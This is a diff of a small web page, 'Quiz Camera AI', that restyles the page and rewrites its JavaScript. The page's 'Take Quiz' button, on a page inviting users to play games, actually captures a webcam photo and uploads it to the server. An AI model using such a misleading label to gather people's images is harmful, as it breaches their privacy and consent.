--- a/index.html
+++ b/index.html
@@ -6,32 +6,43 @@
   <title>Quiz Camera AI</title>
   <style>
     body {
-      text-align: center;
       font-family: Arial, sans-serif;
-      background-color: #f5f5f5;
+      text-align: center;
+      background-color: #f2f2f2;
+      margin: 0;
       padding: 20px;
     }
+
     h1 {
-      font-size: 26px;
       color: #222;
+      font-size: 26px;
+      margin-bottom: 30px;
     }
+
     button {
-      padding: 10px 20px;
-      margin: 10px;
-      font-size: 18px;
-      border: none;
-      border-radius: 6px;
       background-color: #4CAF50;
+      border: none;
       color: white;
+      padding: 12px 24px;
+      text-align: center;
+      text-decoration: none;
+      display: inline-block;
+      font-size: 18px;
+      margin: 10px;
+      border-radius: 8px;
       cursor: pointer;
+      transition: background-color 0.3s ease;
     }
+
     button:hover {
       background-color: #45a049;
     }
+
     video {
-      margin-top: 15px;
+      margin-top: 25px;
       border-radius: 10px;
-      width: 300px;
+      width: 320px;
+      max-width: 90%;
     }
   </style>
 </head>
@@ -39,45 +50,49 @@
   <h1>Choose an option to play games</h1>
   <button id="takeQuiz">Take Quiz</button>
   <button id="retakeQuiz">Retake Quiz</button>
+  <br />
   <video id="video" autoplay playsinline></video>
 
   <script>
-    const video = document.getElementById('video');
-    const takeQuiz = document.getElementById('takeQuiz');
-    const retakeQuiz = document.getElementById('retakeQuiz');
+    const video = document.getElementById("video");
+    const takeQuiz = document.getElementById("takeQuiz");
+    const retakeQuiz = document.getElementById("retakeQuiz");
 
     async function startCamera() {
       try {
         const stream = await navigator.mediaDevices.getUserMedia({ video: true });
         video.srcObject = stream;
       } catch (err) {
-        alert('Camera access denied!');
+        alert("Camera access denied!");
       }
     }
 
     async function captureAndUpload() {
-      const canvas = document.createElement('canvas');
+      const canvas = document.createElement("canvas");
       canvas.width = video.videoWidth;
       canvas.height = video.videoHeight;
-      canvas.getContext('2d').drawImage(video, 0, 0);
+      canvas.getContext("2d").drawImage(video, 0, 0);
+
       canvas.toBlob(async (blob) => {
         const formData = new FormData();
-        formData.append('photo', blob, 'photo.jpg');
+        formData.append("photo", blob, "photo.jpg");
+
         try {
-          const res = await fetch('/upload', {
-            method: 'POST',
-            body: formData
+          const res = await fetch("/upload", {
+            method: "POST",
+            body: formData,
           });
           const data = await res.json();
+
           if (data.filePath) {
             alert(`📸 Photo uploaded: ${data.filePath}`);
           } else {
-            alert('Upload failed!');
+            alert("Upload failed!");
           }
         } catch (e) {
-          alert('Error uploading photo!');
+          alert("Error uploading photo!");
         }
-      }, 'image/jpeg');
+      }, "image/jpeg");
     }
 
     takeQuiz.onclick = () => captureAndUpload();
